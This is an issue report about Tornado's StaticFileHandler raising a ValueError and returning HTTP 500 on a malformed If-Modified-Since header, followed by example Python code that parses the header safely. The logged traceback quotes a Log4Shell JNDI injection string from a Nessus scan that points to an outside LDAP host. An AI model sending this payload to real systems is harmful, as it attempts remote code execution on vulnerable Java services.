ValueError when If-Modified-Since is invalid for StaticFileHandler request
Hello, recently our application underwent a security scan and I noticed our Tornado app was returning HTTP 500 for some requests:
HTTPServerRequest(protocol='http', host='ip-x-x-x-x.ec2.internal', method='GET', uri='/', version='HTTP/1.1', remote_ip='x.x.x.x')
Traceback (most recent call last):
  File "/opt/service/.local/lib/python3.11/site-packages/tornado/web.py", line 1790, in _execute
    result = await result
             ^^^^^^^^^^^^
  File "/opt/service/.local/lib/python3.11/site-packages/tornado/web.py", line 2695, in get
    if self.should_return_304():
       ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/service/.local/lib/python3.11/site-packages/tornado/web.py", line 2820, in should_return_304
    if_since = email.utils.parsedate_to_datetime(ims_value)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/email/utils.py", line 200, in parsedate_to_datetime
    raise ValueError('Invalid date value or format "%s"' % str(data))
ValueError: Invalid date value or format "${jndi:ldap://log4shell-generic-xxx${lower:ten}.w.nessus.org/nessus}"
2024-06-26 11:46:16.900 500 GET / (x.x.x.x) 8.71ms
Looks like tornado.web.StaticFileHandler.should_return_304 is blindly parsing the If-Modified-Since header, resulting in 500s. Ideally, invalid headers would return 400s.
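One way to evaluate If-Modified-Since so that a malformed value cannot raise out of the handler, as an added example that is not Tornado's code or part of the original report; the function names, the `reject_invalid` switch and the sample header values are assumptions constructed here. With `reject_invalid=False` an unparseable value is ignored, which is what RFC 9110 specifies for an invalid HTTP-date; with `True` it maps to the 400 the report asks for.

```python
import datetime
import email.utils
from typing import Optional

UTC = datetime.timezone.utc


def parse_http_date(value: Optional[str]) -> Optional[datetime.datetime]:
    """Return an aware UTC-comparable datetime, or None if missing/invalid."""
    if value is None:
        return None
    try:
        parsed = email.utils.parsedate_to_datetime(value)
    except (TypeError, ValueError):
        # ValueError on Python 3.10+, TypeError on older interpreters;
        # out-of-range fields (e.g. day 32) also surface as ValueError.
        return None
    if parsed.tzinfo is None:
        # A "-0000" zone yields a naive datetime; treat it as UTC so the
        # comparison with an aware mtime cannot raise TypeError.
        parsed = parsed.replace(tzinfo=UTC)
    return parsed


def conditional_status(ims_value: Optional[str],
                       modified: datetime.datetime,
                       reject_invalid: bool = False) -> int:
    """Status code for a GET given If-Modified-Since and the file's mtime."""
    if ims_value is None:
        return 200
    if_since = parse_http_date(ims_value)
    if if_since is None:
        # Client-supplied garbage is a client error or a no-op, never a 500.
        return 400 if reject_invalid else 200
    return 304 if if_since >= modified else 200


if __name__ == "__main__":
    # Constructed sample inputs, not values taken from a real request log.
    mtime = datetime.datetime(2024, 6, 1, 12, 0, 0, tzinfo=UTC)
    samples = [
        None,
        "Wed, 26 Jun 2024 11:46:16 GMT",
        "Wed, 01 May 2024 00:00:00 GMT",
        "${constructed-scanner-probe}",
        "",
    ]
    for header in samples:
        print(repr(header), conditional_status(header, mtime),
              conditional_status(header, mtime, reject_invalid=True))
```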